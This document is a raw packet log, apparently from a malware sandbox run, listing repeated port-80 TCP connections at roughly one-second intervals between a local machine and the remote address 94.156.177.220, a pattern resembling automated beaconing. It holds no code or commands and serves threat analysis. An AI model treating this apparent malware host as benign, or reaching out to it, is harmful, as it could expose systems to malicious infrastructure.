Oct 27, 2024 08:50:33.658751011 CET	49792	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:33.661962032 CET	49792	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:33.667292118 CET	80	49792	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:33.667351961 CET	49792	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:33.672627926 CET	80	49792	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:34.847650051 CET	80	49792	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:34.847748041 CET	80	49792	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:34.847904921 CET	49792	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:34.847906113 CET	49792	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:34.848311901 CET	80	49792	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:34.848366022 CET	49792	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:34.853266001 CET	80	49792	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:34.982975006 CET	49798	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:34.988348961 CET	80	49798	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:34.988444090 CET	49798	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:34.990396023 CET	49798	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:34.995696068 CET	80	49798	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:34.995763063 CET	49798	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:35.001071930 CET	80	49798	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:35.960557938 CET	80	49798	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:35.960695982 CET	49798	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:35.966326952 CET	80	49798	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:35.966388941 CET	49798	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:36.111795902 CET	49809	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:36.117371082 CET	80	49809	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:36.117476940 CET	49809	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:36.119483948 CET	49809	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:36.124771118 CET	80	49809	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:36.124867916 CET	49809	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:36.130156040 CET	80	49809	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:37.083184004 CET	80	49809	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:37.083297968 CET	49809	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:37.088869095 CET	80	49809	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:37.088932037 CET	49809	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:37.219568014 CET	49815	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:37.224967003 CET	80	49815	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:37.225174904 CET	49815	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:37.226938963 CET	49815	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:37.232256889 CET	80	49815	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:37.232323885 CET	49815	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:37.237642050 CET	80	49815	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:38.181829929 CET	80	49815	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:38.181996107 CET	49815	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:38.187702894 CET	80	49815	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:38.187771082 CET	49815	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:38.350162029 CET	49821	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:38.355562925 CET	80	49821	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:38.355638027 CET	49821	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:38.357383013 CET	49821	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:38.362721920 CET	80	49821	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:38.362776041 CET	49821	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:38.368083000 CET	80	49821	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:39.332216024 CET	80	49821	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:39.332351923 CET	49821	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:39.341012955 CET	80	49821	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:39.341097116 CET	49821	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:39.475090981 CET	49829	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:39.480441093 CET	80	49829	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:39.480623007 CET	49829	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:39.483563900 CET	49829	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:39.488892078 CET	80	49829	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:39.488975048 CET	49829	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:39.494327068 CET	80	49829	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:40.457182884 CET	80	49829	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:40.457308054 CET	49829	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:40.462994099 CET	80	49829	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:40.463078022 CET	49829	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:40.616116047 CET	49838	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:40.621685028 CET	80	49838	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:40.621786118 CET	49838	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:40.624785900 CET	49838	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:40.630119085 CET	80	49838	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:40.630175114 CET	49838	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:40.635550976 CET	80	49838	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:41.617400885 CET	80	49838	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:41.617558002 CET	49838	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:41.623353958 CET	80	49838	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:41.623426914 CET	49838	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:41.764581919 CET	49844	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:41.770034075 CET	80	49844	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:41.770147085 CET	49844	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:41.772089005 CET	49844	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:41.777471066 CET	80	49844	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:41.777545929 CET	49844	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:41.783356905 CET	80	49844	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:42.727080107 CET	80	49844	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:42.727221012 CET	49844	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:42.732920885 CET	80	49844	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:42.732995987 CET	49844	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:42.873279095 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:43.858247042 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:43.914180040 CET	80	49850	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:43.914280891 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:43.914396048 CET	80	49850	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:43.914448977 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:43.916439056 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:43.921715975 CET	80	49850	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:43.921772957 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:43.927063942 CET	80	49850	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:44.891721964 CET	80	49850	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:44.891989946 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:44.897634983 CET	80	49850	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:44.897758961 CET	49850	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:45.033068895 CET	49861	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:45.038606882 CET	80	49861	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:45.038683891 CET	49861	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:45.040549994 CET	49861	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:45.046670914 CET	80	49861	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:45.046730995 CET	49861	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:45.052275896 CET	80	49861	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:46.012943983 CET	80	49861	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:46.013060093 CET	49861	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:46.018780947 CET	80	49861	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:46.018842936 CET	49861	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:46.170434952 CET	49867	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:46.175869942 CET	80	49867	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:46.176125050 CET	49867	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:46.186017990 CET	49867	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:46.191576004 CET	80	49867	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:46.191642046 CET	49867	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:46.197000980 CET	80	49867	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:47.146908045 CET	80	49867	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:47.147006035 CET	49867	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:47.152741909 CET	80	49867	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:47.152820110 CET	49867	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:47.316646099 CET	49873	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:47.322033882 CET	80	49873	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:47.322113037 CET	49873	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:47.324702024 CET	49873	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:47.330022097 CET	80	49873	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:47.330074072 CET	49873	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:47.335477114 CET	80	49873	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:48.291358948 CET	80	49873	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:48.291816950 CET	49873	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:48.297660112 CET	80	49873	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:48.299782038 CET	49873	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:48.440170050 CET	49882	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:48.445600986 CET	80	49882	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:48.445693016 CET	49882	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:48.447721958 CET	49882	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:48.453080893 CET	80	49882	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:48.455794096 CET	49882	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:48.461112976 CET	80	49882	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:49.446065903 CET	80	49882	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:49.446252108 CET	49882	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:49.451833963 CET	80	49882	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:49.451894999 CET	49882	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:49.592495918 CET	49889	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:49.597996950 CET	80	49889	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:49.598129988 CET	49889	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:49.607281923 CET	49889	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:49.612608910 CET	80	49889	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:49.612677097 CET	49889	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:49.618115902 CET	80	49889	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:50.556979895 CET	80	49889	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:50.557158947 CET	49889	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:50.562943935 CET	80	49889	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:50.563007116 CET	49889	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:50.700947046 CET	49895	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:50.706298113 CET	80	49895	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:50.706406116 CET	49895	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:50.708364964 CET	49895	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:50.713854074 CET	80	49895	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:50.713924885 CET	49895	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:50.719192028 CET	80	49895	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:51.655670881 CET	80	49895	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:51.668504000 CET	49895	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:51.674467087 CET	80	49895	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:51.674527884 CET	49895	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:51.811635971 CET	49901	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:51.816968918 CET	80	49901	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:51.817047119 CET	49901	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:51.820003033 CET	49901	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:51.825351954 CET	80	49901	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:51.825406075 CET	49901	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:51.830727100 CET	80	49901	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:52.780123949 CET	80	49901	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:52.780313969 CET	49901	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:52.785981894 CET	80	49901	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:52.786047935 CET	49901	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:52.931356907 CET	49912	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:52.937607050 CET	80	49912	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:52.937712908 CET	49912	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:52.940668106 CET	49912	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:52.946469069 CET	80	49912	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:52.946537018 CET	49912	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:52.952920914 CET	80	49912	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:53.905054092 CET	80	49912	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:53.905837059 CET	49912	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:53.913692951 CET	80	49912	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:53.913785934 CET	49912	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:54.048437119 CET	49918	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:54.055119038 CET	80	49918	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:54.055211067 CET	49918	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:54.057336092 CET	49918	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:54.062865019 CET	80	49918	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:54.062937021 CET	49918	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:54.068283081 CET	80	49918	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:55.022402048 CET	80	49918	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:55.022586107 CET	49918	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:55.028582096 CET	80	49918	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:55.028651953 CET	49918	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:55.169799089 CET	49924	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:55.176151037 CET	80	49924	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:55.176240921 CET	49924	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:55.178208113 CET	49924	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:55.183665991 CET	80	49924	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:55.183722019 CET	49924	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:55.189152956 CET	80	49924	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:56.154295921 CET	80	49924	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:56.154423952 CET	49924	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:56.160155058 CET	80	49924	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:56.160231113 CET	49924	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:56.294958115 CET	49931	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:56.300287962 CET	80	49931	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:56.300374031 CET	49931	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:56.302401066 CET	49931	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:56.307739019 CET	80	49931	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:56.307812929 CET	49931	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:56.313266993 CET	80	49931	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:57.274689913 CET	80	49931	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:57.274912119 CET	49931	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:57.280489922 CET	80	49931	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:57.280548096 CET	49931	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:57.433631897 CET	49940	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:57.438973904 CET	80	49940	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:57.439053059 CET	49940	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:57.441044092 CET	49940	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:57.446322918 CET	80	49940	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:57.446376085 CET	49940	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:57.451689005 CET	80	49940	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:58.414819002 CET	80	49940	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:58.414984941 CET	49940	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:58.420622110 CET	80	49940	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:58.420712948 CET	49940	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:58.567456007 CET	49947	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:58.572849035 CET	80	49947	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:58.572957993 CET	49947	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:58.574897051 CET	49947	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:58.580245018 CET	80	49947	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:58.580399036 CET	49947	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:58.585887909 CET	80	49947	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:59.541858912 CET	80	49947	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:59.543884039 CET	49947	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:59.549633980 CET	80	49947	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:59.551779985 CET	49947	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:59.693340063 CET	49953	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:59.698785067 CET	80	49953	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:59.699821949 CET	49953	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:59.702009916 CET	49953	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:59.707336903 CET	80	49953	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:59.707698107 CET	49953	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:59.713051081 CET	80	49953	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:00.670557976 CET	80	49953	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:00.678057909 CET	49953	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:00.683945894 CET	80	49953	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:00.684015989 CET	49953	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:01.123806000 CET	49964	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:01.129290104 CET	80	49964	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:01.129462004 CET	49964	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:01.131556988 CET	49964	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:01.136982918 CET	80	49964	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:01.137132883 CET	49964	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:01.142486095 CET	80	49964	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:02.093803883 CET	80	49964	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:02.093914986 CET	49964	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:02.099620104 CET	80	49964	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:02.099679947 CET	49964	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:02.252545118 CET	49970	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:02.257930040 CET	80	49970	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:02.258004904 CET	49970	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:02.261420965 CET	49970	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:02.266824007 CET	80	49970	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:02.266872883 CET	49970	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:02.272315025 CET	80	49970	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:03.219717979 CET	80	49970	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:03.219814062 CET	49970	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:03.225409031 CET	80	49970	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:03.225476980 CET	49970	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:03.575345993 CET	49976	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:03.580766916 CET	80	49976	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:03.581408024 CET	49976	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:03.595834970 CET	49976	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:03.601161957 CET	80	49976	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:03.602216005 CET	49976	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:03.607542992 CET	80	49976	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:04.561626911 CET	80	49976	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:04.561745882 CET	49976	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:04.567368984 CET	80	49976	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:04.567440987 CET	49976	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:04.714060068 CET	49982	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:04.719595909 CET	80	49982	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:04.719795942 CET	49982	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:04.721762896 CET	49982	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:04.727116108 CET	80	49982	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:04.727180958 CET	49982	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:04.732573986 CET	80	49982	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:05.696372986 CET	80	49982	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:05.696490049 CET	49982	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:05.702236891 CET	80	49982	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:05.702307940 CET	49982	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:05.852523088 CET	49992	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:05.857991934 CET	80	49992	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:05.858088017 CET	49992	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:05.860179901 CET	49992	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:05.865590096 CET	80	49992	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:05.865657091 CET	49992	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:05.871005058 CET	80	49992	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:06.826184034 CET	80	49992	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:06.826416969 CET	49992	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:06.832174063 CET	80	49992	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:06.832288980 CET	49992	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:06.981426001 CET	49998	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:06.986901999 CET	80	49998	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:06.987004995 CET	49998	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:06.989087105 CET	49998	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:06.994590998 CET	80	49998	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:06.994667053 CET	49998	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:07.000185966 CET	80	49998	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:07.968955994 CET	80	49998	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:07.969090939 CET	49998	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:07.974920988 CET	80	49998	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:07.975002050 CET	49998	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:08.117465973 CET	50005	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:08.126096010 CET	80	50005	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:08.126190901 CET	50005	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:08.128511906 CET	50005	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:08.135015965 CET	80	50005	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:08.135076046 CET	50005	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:08.141499996 CET	80	50005	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:09.108057022 CET	80	50005	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:09.108309984 CET	50005	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:09.114212990 CET	80	50005	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:09.114288092 CET	50005	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:09.273540974 CET	50015	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:09.279040098 CET	80	50015	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:09.279131889 CET	50015	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:09.281228065 CET	50015	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:09.286571026 CET	80	50015	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:09.286645889 CET	50015	80	192.168.2.5	94.156.177.220
